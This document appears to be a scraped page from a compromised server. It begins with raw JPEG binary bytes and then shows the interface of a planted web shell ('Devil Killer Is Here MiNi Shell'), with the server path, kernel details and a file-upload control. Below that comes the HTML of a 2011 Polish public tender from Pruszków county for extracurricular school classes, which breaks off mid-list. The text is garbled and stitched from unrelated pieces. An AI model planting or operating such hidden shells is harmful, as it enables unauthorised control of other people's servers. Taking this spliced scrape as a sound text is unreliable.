JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111027/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111027/282487-N-2011.html

<p class="kh_header"><b>Pruszków: Prowadzenie dodatkowych zajęć dla uczniów Technikum i Zasadniczej Szkoły Zawodowej z Zespołu Szkół nr 1 im. S. Staszica w Pruszkowie w ramach projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 282487 - 2011; data zamieszczenia: 27.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Pruszkowski , ul. Drzymały 30, 05-800 Pruszków, woj. mazowieckie, tel. 022 7381400, faks 022 728 92 47.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.pruszkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie dodatkowych zajęć dla uczniów Technikum i Zasadniczej Szkoły Zawodowej z Zespołu Szkół nr 1 im. S. Staszica w Pruszkowie w ramach projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług polegających na prowadzeniu dodatkowych zajęć, kół, klubów  i sekcji  sportowych  rozwijających zainteresowania i uzdolnienia uczniów Technikum i Zasadniczej Szkoły Zawodowej z Zespołu Szkół nr 1 im. S. Staszica w Pruszkowie,  w ramach projektu  Mobilni zawodowo i gotowi na nowe wyzwania współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.  Usługa będzie wykonywana w siedzibie Zespołu Szkół Nr 1 im. S. Staszica w Pruszkowie w godzinach uzgodnionych z Kierownikiem projektu, dostosowanych do aktualnie obowiązującego tygodniowego planu zajęć lekcyjnych w Zespole Szkół Nr 1. 
Po uzgodnieniu z Kierownikiem projektu i uczestnikami kół/klubów/sekcji, możliwe jest prowadzenie zajęć w soboty oraz w czasie ferii zimowych. Używane w SIWZ pojęcie godziny dydaktycznej dotyczy 45 minut zajęć z uczniami - uczestnikami projektu.

Dane dotyczące projektu: 
Projekt realizowany jest w Zespole Szkół nr 1 im. S. Staszica  w  Pruszkowie,  dla  którego   organem prowadzącym jest Starostwo Powiatu Pruszkowskiego - Beneficjent projektu.
Okres realizacji projektu: 1.09.2009 - 30.06.2013 r. W  projekcie założono, że  w  latach 2009 - 2013,  w zakresie dotyczącym niniejszego zamówienia, 448 uczniów będzie miało możliwość rozwinięcia swoich zainteresowań i uzdolnień, w tym m.in.: 52 uczestników przystąpi do egzaminów potwierdzających umiejętności językowe, 90 uczestników przystąpi do egzaminu potwierdzającego umiejętności komputerowe, o 10 pkt. procentowych wzrośnie odsetek uczniów podejmujących kształcenie na wyższych poziomach edukacji, ok. 75% uczniów poprawi umiejętności kluczowe. 
Wykonawcę obowiązuje należyta staranność w wykonywaniu przedmiotu zamówienia. Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania  przedmiotu zamówienia. Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo  uczniów w czasie zajęć oraz odpowiedzialność materialną za sprzęt i pomoce  dydaktyczne  znajdujące  się w salach lekcyjnych, w których  prowadzi zajęcia. 
Przedmiot zamówienia składa się z 13 części.

Wykonawcy zadań 1 -13 będą zobowiązani do:
1. Promowanie prowadzonych przez siebie zajęć w ramach projektu w społeczności szkolnej Zespołu Szkół Nr 1.
2. Opracowania programu zajęć na każdy rok szkolny z uwzględnieniem założeń dotyczących   prowadzonych  zajęć,  wniosków wynikających obserwacji uczestników i wyników badań ewaluacyjnych. 
3. Monitorowania postępów uczniów.
4. Podejmowania działań zmierzających do poprawy motywacji i aspiracji uczestników.
5. Promowania projektu, w tym opracowywania materiałów edukacyjnych wykorzystywanych w trakcie zajęć  zgodnie z wytycznymi dotyczącymi promocji projektów współfinansowanych przez Unię Europejską w ramach Programu Operacyjnego Kapitał Ludzki.
6. Udziału w typowaniu uczestników zajęć do systemu motywacyjnego funkcjonującego w projekcie, zgodnie z regulaminem i harmonogramem projektu.
7. Zachowania równości szans pod względem płci w ramach udzielanego wsparcia.
8. Systematycznego   prowadzenia  dzienników zajęć oraz zachowania należytej staranności dotyczącej przechowywania i zdawania do archiwum dokumentów projektowych.
9. Terminowego sporządzania 3 raportów w każdym roku szkolnym (koniec listopada, marca i czerwca) z efektywności udzielanego wsparcia, w tym opracowania wniosków z ewaluacji.
10. Prowadzenia ewidencji godzin pracy w postaci okresowo składanych kart rozliczeniowych oraz potwierdzenia wykonania zlecenia w protokołach odbioru. 
11. Udziału w cokwartalnych spotkaniach zespołu projektu.
12. Dostosowania godzin zajęć dodatkowych do tygodniowego planu zajęć obowiązkowych i potrzeb uczestników projektu, w uzgodnieniu z Kierownikiem projektu.
13. Współpracy z Kierownikiem i Koordynatorem projektu

Opis dodatkowy:
1. Wykonawca  będący  osobą fizyczną jest zobowiązany  do osobistego wykonania pracy, nie może powierzać całości lub części pracy określonej w umowie do wykonania osobom trzecim bez pisemnej zgody Zamawiającego. W sytuacjach koniecznych, okresowe zastępstwo za Wykonawcę należy uzgodnić pisemnie z Kierownikiem projektu.
2. Wykonawca będący osobą prawną nie może powierzać całości lub części pracy określonej w umowie do wykonania osobom trzecim. Wykonawca zobowiązany jest do wskazania osób,  które  będą prowadziły zajęcia. Zamawiający zobowiązuje Wykonawcę do niewprowadzania zmian w obsadzie prowadzących zajęcia w trakcie realizacji projektu, bez pisemnego uzgodnienia z Kierownikiem Projektu.
3. Z  Wykonawcą  będzie podpisana umowa zlecenie. 
4. Rozliczenia za wykonanie przedmiotu zamówienia będzie odbywać się cykliczne, 
na zasadach określonych we wzorze umowy.
5. Wykonawcę obowiązuje należyta  staranność  w  wykonywaniu  przedmiotu zamówienia.
6. Zamawiający zastrzega sobie prawo do wcześniejszego rozwiązania umowy, o czym powiadomi Wykonawcę pisemnie nie później niż miesiąc przed terminem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania uprawnień do wykonywania określonej działalności 
lub czynności Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wykazać, że wykonał w okresie ostatnich trzech lat minimum jedno zamówienie o podobnym charakterze. Za zamówienie o podobnym charakterze Zamawiający uzna prace związane z prowadzeniem zajęć z uczniami szkół ponadgimnazjalnych, w których programie zawarte były treści edukacyjne opisane w poszczególnych zadaniach.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania odpowiednim potencjałem technicznym Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wykazać, iż będzie dysponował jedną osobą na każde zadanie, która spełnia niżej wymienione wymagania: 
1. Posiada przygotowanie pedagogiczne oraz dyplom ukończenia studiów magisterskich na kierunku (specjalności):
a) w zad. 1 - filologia angielska lub studia magisterskie na kierunku innym niż rodzaj prowadzonych zajęć i studia podyplomowe z zakresu dydaktyki i metodyki nauczania języków obcych oraz certyfikat potwierdzający znajomość języka angielskiego na poziomie CPE;
b) w zad. 2 - filologia  germańska lub studia magisterskie na kierunku innym niż rodzaj prowadzonych zajęć i studia podyplomowe z zakresu dydaktyki i metodyki nauczania języków obcych oraz certyfikat potwierdzający znajomość języka niemieckiego na poziomie C 2; 
c) w zad. 3 - budownictwo  lub  inżynieria lądowa;
d) w zad.4 - informatyka  lub kierunku, którego zakres określony w standardzie kształcenia dla tego kierunku studiów w grupie treści podstawowych i kierunkowych obejmował treści prowadzonych zajęć;
e) w zad. 5 i zad. 6 - fizyka; 
f) w zad. 7 - matematyka;
g) w zad. 8 - wychowanie  plastyczne  lub edukacja plastyczna lub malarstwo lub pokrewne;
h) w zad. 9, 10 i 11 - wychowanie fizyczne;
i) w zad. 12 i 13 - filologia polska.
2. Posiada  co  najmniej stopień awansu zawodowego nauczyciela kontraktowego;
3. W ostatnich trzech latach  pracowała  z uczniami ze szkół ponadgimnazjalnych 
oraz wykonywała  pracę  związaną z nauczaniem treści edukacyjnych podanych   
w poszczególnych zadaniach.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie sytuacji ekonomicznej i finansowej Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. formularz oferty - /zał. nr 1/;
2. upoważnienie do występowania w imieniu Wykonawcy - /zał. nr 2/ - załącznik Wykonawcy;
3. Wybrany Wykonawca najpóźniej w dniu podpisania umowy przedstawi Zamawiającemu kserokopie poświadczone za zgodność z oryginałem niżej wymienionych dokumentów osoby/osób wskazanej/ych do prowadzenia zajęć:
1) dyplom ukończenia studiów wyższych  na kierunku  uprawniającym do prowadzenia zajęć lekcyjnych o charakterze wynikającym z opisu zadania, na które składa ofertę;
2) zaświadczenie lub dyplom potwierdzający  kwalifikacje pedagogiczne;
3) akt nadania stopnia awansu zawodowego;
a także oświadczenie, o spełnieniu wymaganego  doświadczenia w pracy z uczniami ze szkół  ponagimnazjalnych,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.powiat.pruszkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 05-800 Pruszków, ul. Drzymały 30, piętro III, pok. nr 306.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.11.2011 godzina 09:30, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego - w sekretariacie Starostwa Powiatowego w Pruszkowie, piętro III, pok. nr 318 (wejście A)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane jest w ramach Projektu Mobilni zawodowo i gotowi na nowe wyzwania współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Prowadzenie zajęć w ramach Klubu języka angielskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć w ramach Klubu języka angielskiego od dnia podpisania umowy do końca roku szkolnego w czerwcu 2013 r. (z wyłączeniem  ferii  letnich),  w wymiarze przeciętnie 3 godz. dydaktyczne  tygodniowo, nie więcej niż 111 godz. w roku szkolnym. Zajęcia dla dwóch grup uczniów: średniozaawansowanej (1 h) i zaawansowanej (2h) przygotowujące uczestników 
do egzaminu potwierdzającego umiejętności językowe FCE w British Council (liczba przystępujących: od 4 do 6 osób rocznie) i egzaminu maturalnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Prowadzenie zajęć w ramach Klubu języka niemieckiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć w ramach Klubu języka niemieckiego od dnia  podpisania  umowy do końca  roku  szkolnego w czerwcu 2013 r. (z wyłączeniem ferii letnich), w wymiarze przeciętnie 3 godz. dydaktyczne tygodniowo, nie więcej niż 111 godz. w roku szkolnym. Zajęcia dla dwóch grup uczniów: średniozaawansowanej (1 h) i zaawansowanej (2h) przygotowujące uczestników 
do egzaminu potwierdzającego umiejętności językowe Grundstufe Deutsch w Instytucie Austriackim (liczba przystępujących: od 5 do 12 osób rocznie) i egzaminu maturalnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Prowadzenie zajęć w ramach Klubu młodego budowlańca.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć w ramach Klubu młodego budowlańca  od dnia podpisania  umowy do końca  roku  szkolnego w czerwcu 2013 r. (z wyłączeniem ferii letnich), w wymiarze przeciętnie 2 godz. dydaktyczne tygodniowo, nie więcej niż 74 godz. w roku szkolnym. Zajęcia dla uczniów Technikum Budowlanego pogłębiające umiejętności kosztorysowania w budownictwie 
z wykorzystaniem programu komputerowego NORMA i przygotowanie uczestników do  egzaminu potwierdzającego  umiejętności  zawodowe  (minimum 12 osób rocznie)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Prowadzenie zajęć w  ramach Klubu młodego informatyka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć w  ramach Klubu młodego informatyka  od  dnia podpisania  umowy do końca  roku  szkolnego w czerwcu 2013 r. (z wyłączeniem ferii letnich), w wymiarze przeciętnie 2 godz. dydaktyczne tygodniowo, nie więcej niż 74 godz. w roku szkolnym. Zajęcia dla uczniów (minimum 14 osób rocznie) przygotowujące uczestników do egzaminu potwierdzającego umiejętności komputerowe ECDL przeprowadzanego w czerwcu każdego roku dla kolejnych grup uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Prowadzenie zajęć w ramach Koła fizycznego dla uczniów Technikum Budowlanego i Technikum Ochrony Środowiska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć w ramach Koła fizycznego  od  dnia  podpisania umowy do  końca  roku  szkolnego w czerwcu 2013 r. (z wyłączeniem ferii letnich), w wymiarze przeciętnie 2 godz. dydaktyczne tygodniowo (możliwe 2 grupy, po 1 h każda), nie więcej niż 74 godz. w roku szkolnym. Zajęcia dla uczniów Technikum Budowlanego i Technikum Ochrony Środowiska (minimum 8 osób rocznie) pogłębiające wiedzę i umiejętności i przygotowujące chętnych uczestników do egzaminu maturalnego z fizyki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Prowadzenie zajęć w ramach Koła fizycznego dla uczniów Technikum Informatycznego, Ekonomicznego i Ochrony Środowiska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć w ramach Koła fizycznego  od dnia podpisania umowy do  końca  roku  szkolnego w czerwcu 2013 r. (z wyłączeniem ferii letnich), w wymiarze przeciętnie 2 godz. dydaktyczne tygodniowo (możliwe 2 grupy, po 1 h każda), nie więcej niż 74 godz. w roku szkolnym. Zajęcia dla uczniów Technikum Informatycznego, Ekonomicznego i Ochrony Środowiska (minimum 8 osób rocznie) pogłębiające wiedzę i umiejętności i przygotowujące chętnych uczestników do egzaminu maturalnego z fizyki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Prowadzenie zajęć w ramach Koła matematycznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć w ramach Koła matematycznego od  dnia  podpisania umowy  do  końca  roku  szkolnego w czerwcu 2013 r. (z wyłączeniem ferii letnich), w wymiarze przeciętnie 2 godz. dydaktyczne tygodniowo (możliwe 2 grupy, po 1 h każda), nie więcej niż 74 godz. w roku szkolnym. Zajęcia dla uczniów Techników (minimum 12 osób rocznie) pogłębiające wiedzę i umiejętności matematyczne i przygotowujące chętnych uczestników do egzaminu maturalnego z matematyki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Prowadzenie zajęć w ramach Koła  plastycznego.</p>
